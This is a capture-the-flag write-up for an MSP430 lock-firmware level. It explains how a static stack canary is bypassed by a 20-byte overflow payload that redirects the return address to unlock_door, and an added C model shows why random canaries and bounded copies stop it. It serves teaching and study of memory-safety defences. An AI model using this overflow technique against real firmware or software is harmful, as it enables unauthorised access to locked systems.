# 8. Johannesburg

# Challenge Overview

OVERVIEW

    - A firmware update rejects passwords which are too long.
    - This lock is attached to the LockIT Pro HSM-1.

# Solution

Looking at the assembly, there is a static canary after the input buffer: the byte at `0x11(sp)` is compared against the constant `0x86`:

    4566:  b012 4644      call  #0x4446 <unlock_door>
    ---
    4578:  f190 8600 1100 cmp.b #0x86, 0x11(sp)
    457e:  0624           jz    $+0xe <login+0x60>
    4580:  3f40 ff44      mov   #0x44ff "Invalid Password Length: password too long.",
    ---
    458c:  3150 1200      add   #0x12, sp

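To get around this, we can include the canary byte in the input at the right offset:

    | padding | canary | srp |

So: 0x41*17 + 0x86 + 0x4644, i.e. 17 bytes of padding, the canary byte, and then the bytes `46 44`, which are the address of `unlock_door` (`0x4446`) in little-endian order.

Trying this:

    4141414141414141414141414141414141864644

This works!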

Nice intro to canaries.
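
An added example (not part of the original write-up or the challenge firmware): a C model of the login frame from the listing above, showing why a constant canary byte does not stop the overwrite, while a canary the sender cannot predict or a length-bounded copy does. The function names, `LEGIT_RET`, `CHECK_FAILED` and the `0x3c` canary value are constructed for the illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Frame layout read off the listing: cmp.b #0x86, 0x11(sp) and add #0x12, sp. */
enum { BUF_LEN = 0x11, CANARY_OFF = 0x11, RET_OFF = 0x12, FRAME_LEN = 0x14 };
#define LEGIT_RET    0x1234u /* constructed placeholder for the caller's address */
#define CHECK_FAILED 0u      /* model value: the check refuses to return */

/* The input from the write-up: 17 x 0x41, the canary byte, then 46 44. */
static const uint8_t PAGE_INPUT[FRAME_LEN] = {
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x86, 0x46, 0x44
};

/* Copy input into a modelled frame, then run the canary comparison.
 * bounded = 0 mimics the unchecked copy; bounded = 1 truncates to BUF_LEN.
 * Returns the address a `ret` would load, or CHECK_FAILED. */
static uint16_t login_model(const uint8_t *in, size_t len, uint8_t canary, int bounded)
{
    uint8_t frame[FRAME_LEN] = {0};
    size_t limit = bounded ? BUF_LEN : FRAME_LEN; /* never writes past the model */

    frame[CANARY_OFF]  = canary;
    frame[RET_OFF]     = LEGIT_RET & 0xff;        /* MSP430 is little-endian */
    frame[RET_OFF + 1] = LEGIT_RET >> 8;
    memcpy(frame, in, len > limit ? limit : len);

    if (frame[CANARY_OFF] != canary)
        return CHECK_FAILED;
    return (uint16_t)(frame[RET_OFF] | (frame[RET_OFF + 1] << 8));
}

/* Constant canary, as in the firmware: the input simply carries 0x86 along. */
uint16_t with_static_canary(void) { return login_model(PAGE_INPUT, FRAME_LEN, 0x86, 0); }
/* Canary chosen per boot (assumed to come from a hardware RNG): mismatch. */
uint16_t with_fresh_canary(uint8_t c) { return login_model(PAGE_INPUT, FRAME_LEN, c, 0); }
/* Length-bounded copy: canary and return address are never reached. */
uint16_t with_bounded_copy(void) { return login_model(PAGE_INPUT, FRAME_LEN, 0x86, 1); }

int main(void)
{
    printf("static canary : ret = 0x%04x\n", (unsigned)with_static_canary());
    printf("fresh canary  : ret = 0x%04x\n", (unsigned)with_fresh_canary(0x3c));
    printf("bounded copy  : ret = 0x%04x\n", (unsigned)with_bounded_copy());
    return 0;
}
```

A one-byte canary still leaves a 1-in-256 guess even when it is random, so a real implementation uses a full word and keeps the bounded copy as the primary fix.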